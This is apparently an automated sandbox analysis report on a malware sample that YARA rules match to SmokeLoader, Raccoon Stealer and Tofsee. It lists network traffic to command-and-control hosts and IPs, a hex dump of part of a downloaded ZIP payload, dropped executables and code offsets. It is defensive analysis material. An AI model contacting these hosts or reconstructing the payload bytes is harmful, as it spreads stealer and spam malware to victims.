                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 61 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 82 4e 01 6f 19 f6 ac 9a b5 a4 5f bc 05 c4 2d b5 5f 4b da 00 e9 ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aI:82ONo_-_K0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 22:39:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Jan 2022 22:39:15 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgroj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49809 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49868 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49871 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 94.102.49.170:443 -> 192.168.2.5:49875 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49882 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.5:49890 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49894 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.5:49906 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 0.2.NNOKmCIVoi.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.NNOKmCIVoi.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.NNOKmCIVoi.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.eugcwgv.5c15a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.eugcwgv.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.eugcwgv.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.eugcwgv.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.319704105.0000000002161000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.376787167.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.319374024.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.376757329.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.304234913.0000000004F21000.00000020.00020000.sdmp, type: MEMORY
                          Source: NNOKmCIVoi.exe, 00000000.00000002.255205101.000000000065A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002F.00000002.526432273.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.545472063.0000000004860000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000003.462885844.0000000004990000.00000004.00000001.sdmp, type: MEMORY

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.d40e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.2090e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.3.qflfaqod.exe.d60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.12CC.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.da0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.3.12CC.exe.20b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.da0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 41.2.qflfaqod.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000019.00000002.420370458.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430698166.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430085518.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.423567221.0000000002090000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.430746891.0000000000DA0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.527865017.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.427461550.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000003.400320288.00000000020B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 12CC.exe PID: 6648, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: qflfaqod.exe PID: 4380, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has a writeable .text sectionShow sources
                          Source: E3A0.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          PE file has nameless sectionsShow sources
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2196 -ip 2196
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0041047B
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00405177
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_004115FB
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_004109BF
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0041235C
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00410F03
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0040C735
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00473253
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_004731FF
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_00402AB3
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_00402B2E
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032596F0
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_03250462
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_03250470
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032EDE18
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032EADC0
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032E8658
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032E8DE8
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032E8DF8
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00401280 VirtualAlloc,ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: NNOKmCIVoi.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: NNOKmCIVoi.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
